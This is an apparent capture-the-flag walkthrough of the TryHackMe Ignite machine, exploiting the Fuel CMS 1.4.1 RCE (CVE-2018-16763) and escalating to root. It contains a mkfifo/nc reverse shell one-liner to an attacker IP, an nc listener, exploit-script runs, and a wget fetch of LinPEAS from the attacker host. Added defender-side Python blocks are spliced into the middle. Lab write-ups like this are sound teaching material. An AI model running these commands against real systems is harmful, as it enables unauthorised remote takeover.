How to Hack the TryHackMe Ignite CTF

Master advanced techniques and methodologies in ignite

Dec 21, 2025
20 min read
AlphaSploit Team

Introduction

This article presents a step-by-step walkthrough of Ignite. We focus on identifying and exploiting the Remote Code Execution (RCE) vulnerability in Fuel CMS v1.4.1 (CVE-2018-16763).

The investigation covers the enumeration process, vulnerability discovery, running the exploit, and post-exploitation tasks. It also shows how to escalate privileges by abusing reused credentials (credential reuse) left behind by a misconfiguration, which ultimately leads to root access.

Key Topics:

Enumeration: information gathering and identifying vulnerabilities.

Exploit Analysis: analysing and running the exploit.

Post-Exploitation: actions after compromise and privilege escalation.

1: SCANNING

How to Use Nmap: Target Reconnaissance

Today I am sharing one of the most important tools anyone learning cybersecurity needs: Nmap. If you want to find out what is running on another device or server, Nmap is your first friend.

#### What scan did I run?

I ran a very powerful command known as an Aggressive Scan. The exact command is shown below; its flags are:

  • -sV (Version Detection): I don't just want to know that a port is open; I want to know the exact software running behind it.
  • -A (Aggressive Mode): This is the "all-in-one" option. It combines OS detection, security scripts, and traceroute.
  • -T4 (Speed): I increased the scan speed so the results came back quickly.

nmap -sV -A -T4 10.81.139.78

Nmap Results

2: FOOTHOLD

Once the scan completes, you will see that port 80 is open. If you enter the IP 10.81.139.78 in a browser, you land on the Fuel CMS home page, where you will find additional information about the database and some passwords.

Fuel CMS Homepage

When you scroll to the bottom of the page, you find very important information: the "Admin Endpoint" and the "Credentials" (username and password) used to log into the system. This is where the weakness of the Ignite machine begins.

Finding the Entry Point (Admin Access)

During the enumeration phase, I examined the website's home page. When I scrolled to the bottom of the page, I found golden information that website administrators often forget to remove:

  • Admin Dashboard: /fuel
  • Username: admin
  • Password: admin

This is a clear example of a misconfiguration. Leaving the password at its original default (default credentials) makes it easy for anyone who wants to enter the website's administration area.

#### What does this mean?

Finding the admin page and its password opens a path for us to probe the inside of the Fuel CMS software. Now that we have administrative access, we can begin testing the RCE (Remote Code Execution) vulnerability to take over the whole server.

Admin Credentials

Entering the Dashboard (Gaining Access)

After obtaining the login details, I visited http://10.81.139.78/fuel. I used the username and password (admin / admin). As expected, I successfully logged into the Fuel CMS administration dashboard.

Login Page

Admin Dashboard

3: Exploit Execution

Vulnerability Discovery

The machine was running Fuel CMS 1.4.1, which is known to have an RCE vulnerability. A Google search led me to Exploit-DB (CVE-2018-16763). I also found the same exploit using the searchsploit tool.

#### Understanding the Exploit

This vulnerability stems from improper handling of the input passed to the filter parameter of the /fuel/pages/select/ endpoint. It allows PHP code to be injected, which leads to remote execution of commands on the machine (RCE).

  • Root cause: no validation of what is written into the filter parameter.
  • Security impact: an unauthenticated person can execute system commands.

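As an added defender-side example (not code from the original walkthrough and not Fuel CMS code), the following Python shows the missing check in hardened form, an allow-list validator for the filter value, and applies the same rule to constructed web-server access-log lines to flag requests to /fuel/pages/select/ whose filter carries quote, parenthesis or operator characters. The combined log format, the allow-list policy and the placeholder INJECTED_PHP token are assumptions made for the demonstration.

```python
"""Allow-list validation and log detection for the Fuel CMS
/fuel/pages/select/ filter parameter (constructed example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a benign page filter is a short search term made of letters,
# digits, spaces, hyphens, underscores, dots and slashes. Anything else is
# rejected instead of being handed to PHP.
SAFE_FILTER = re.compile(r"^[A-Za-z0-9 _./-]{0,64}$")

# Characters that have no business in a page-name filter; their presence is
# reported so an analyst can see why a request was flagged.
SUSPICIOUS = ("(", ")", "'", '"', ";", "$", "+", "`")


def is_safe_filter(value: str) -> bool:
    """The hardened form of the missing check: accept only allow-listed text."""
    return bool(SAFE_FILTER.match(value))


# Apache/Nginx "combined" access-log prefix: ip ident user [time] "req" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def inspect_log_line(line: str):
    """Return a finding dict when the line targets the select endpoint with
    a filter value that fails the allow-list, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith("/fuel/pages/select"):
        return None
    # parse_qs percent-decodes the value, so we inspect what PHP would see
    for value in parse_qs(parts.query).get("filter", []):
        if not is_safe_filter(value):
            return {
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": m.group("status"),
                "filter": value,
                "tokens": [t for t in SUSPICIOUS if t in value],
            }
    return None


def scan_log(lines):
    """Run inspect_log_line over an iterable of log lines."""
    return [f for f in (inspect_log_line(l) for l in lines) if f]


# Constructed sample log: one benign filter, one structurally suspicious
# filter (quote + parentheses + plus around a placeholder token), one
# unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Dec/2025:10:00:01 +0000] '
    '"GET /fuel/pages/select/?filter=about HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Dec/2025:10:00:07 +0000] '
    '"GET /fuel/pages/select/?filter=%27%2BINJECTED_PHP%28%29%2B%27 HTTP/1.1" 200 2048',
    '10.0.0.5 - - [21/Dec/2025:10:00:09 +0000] '
    '"GET /index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same allow-list serves both purposes: applied server-side it rejects the injected string before it reaches any code path that evaluates it, and applied to logs it surfaces attempts that reached a still-unpatched instance.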
#### Exploit Execution

After downloading the exploit script, I ran it against the machine to obtain a channel through which I could send commands to the server.

searchsploit FUEL CMS 1.4

Searchsploit Results

python 50477.py -u http://10.91.139.78/
whoami
ls
pwd
cd /home

Exploit Execution

4: Post Exploitation

After confirming that I could execute commands (RCE), I decided to upgrade that connection to a reverse shell so I could get a full terminal to interact with the machine.

I used the website revshells.com to prepare the payload, in Python or Bash form. After opening a listener on my machine with the command nc -lvnp 4444, I ran the reverse shell command on the Ignite machine.

Immediately, I obtained access to the machine as the www-data user. To turn the terminal into a "real shell" (interactive shell), I used the command:

python -c 'import pty; pty.spawn("/bin/bash")'

Reverse Shell Setup

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.219.158 1111 >/tmp/f

Reverse Shell Connection

Shell Access

5: PRIVILEGE ESCALATION

Privilege Escalation Research

Since I was the regular user www-data, I needed to find a way to become the superuser (root). To make that job easier, I transferred the well-known LinPEAS script to the Ignite machine.

cp /usr/share/peass/linpeas/linpeas.sh .
python -m http.server

LinPEAS Setup

wget http://192.168.219.158:8000/linpeas.sh
ls
chmod +x linpeas.sh
./linpeas.sh

LinPEAS Download

LinPEAS Execution

LinPEAS Results

Finding the Root Password

When I manually examined the file LinPEAS pointed me to, I found a password written in plaintext. I suspected this password belonged to the root user, since some people have the habit of using one password in many places (credential reuse).

cat /var/www/html/fuel/application/config/database.php
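An added example, not part of the walkthrough and not Fuel CMS code: a small Python audit that scans a CodeIgniter-style database.php for hard-coded credentials and checks whether the file is readable by other users, the kind of check a practitioner would run to catch a plaintext password like the one found here before an attacker does. The sample config text, the ExamplePass123 value and the temporary-file handling are constructed for the demonstration.

```python
"""Audit a CodeIgniter/Fuel-style PHP config for plaintext database
credentials and over-permissive file modes (constructed example)."""
import os
import re
import stat
import tempfile

# Matches both literal-string styles CodeIgniter uses for database settings:
#   $db['default']['password'] = 'secret';
#   'password' => 'secret',
# A value read through getenv() is not a quoted literal and is not matched.
CRED_RE = re.compile(
    r"""(?:\$db\[['"]\w+['"]\]\[['"](?P<k1>username|password)['"]\]\s*="""
    r"""|['"](?P<k2>username|password)['"]\s*=>)\s*['"](?P<val>[^'"]*)['"]"""
)


def find_plaintext_credentials(php_source: str):
    """Return (key, value) pairs hard-coded as string literals in the config."""
    found = []
    for m in CRED_RE.finditer(php_source):
        key = m.group("k1") or m.group("k2")
        found.append((key, m.group("val")))
    return found


def is_world_readable(path: str) -> bool:
    """True when the 'other' read bit is set on the file."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_config_file(path: str) -> dict:
    """Combine both checks into one report for a config file on disk."""
    with open(path, encoding="utf-8") as fh:
        creds = find_plaintext_credentials(fh.read())
    return {
        "path": path,
        "plaintext_credentials": creds,
        "has_password": any(k == "password" and v for k, v in creds),
        "world_readable": is_world_readable(path),
    }


# Constructed sample in the shape of a CodeIgniter database.php (assumption).
SAMPLE_CONFIG = """<?php
$db['default']['hostname'] = 'localhost';
$db['default']['username'] = 'webapp';
$db['default']['password'] = 'ExamplePass123';
$db['default']['database'] = 'appdb';
"""

# Hardened variant: the secret comes from the environment, not the file.
HARDENED_CONFIG = """<?php
$db['default']['username'] = getenv('DB_USER');
$db['default']['password'] = getenv('DB_PASS');
"""


def write_sample(text: str, mode: int) -> str:
    """Write sample text to a temp file with the given permission bits."""
    fd, path = tempfile.mkstemp(suffix=".php")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(text)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    for text, mode in ((SAMPLE_CONFIG, 0o644), (HARDENED_CONFIG, 0o640)):
        p = write_sample(text, mode)
        print(audit_config_file(p))
        os.remove(p)
```

A password reported by this audit is the one to rotate first, and rotating it everywhere it might have been reused (the root account on this machine, for instance) is what breaks the credential-reuse link the conclusion below describes.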

Database Config File

Root Password Found

I tried to switch to the root user with the command: su root

I entered the password I had found, and I immediately became root!

Root Flag

Now that I had the highest privileges on the machine, I moved to the /root directory to retrieve the final flag:

cat /root/root.txt

Root Flag

Conclusion: What did we learn from Ignite?

This machine is an example of how a chain of weaknesses can lead to a complete takeover of the machine:

1. Outdated CMS: running Fuel CMS 1.4.1, which has an RCE hole.

2. Unprotected data: storing important passwords in plaintext inside supporting files.

3. Password reuse: using one password for different services.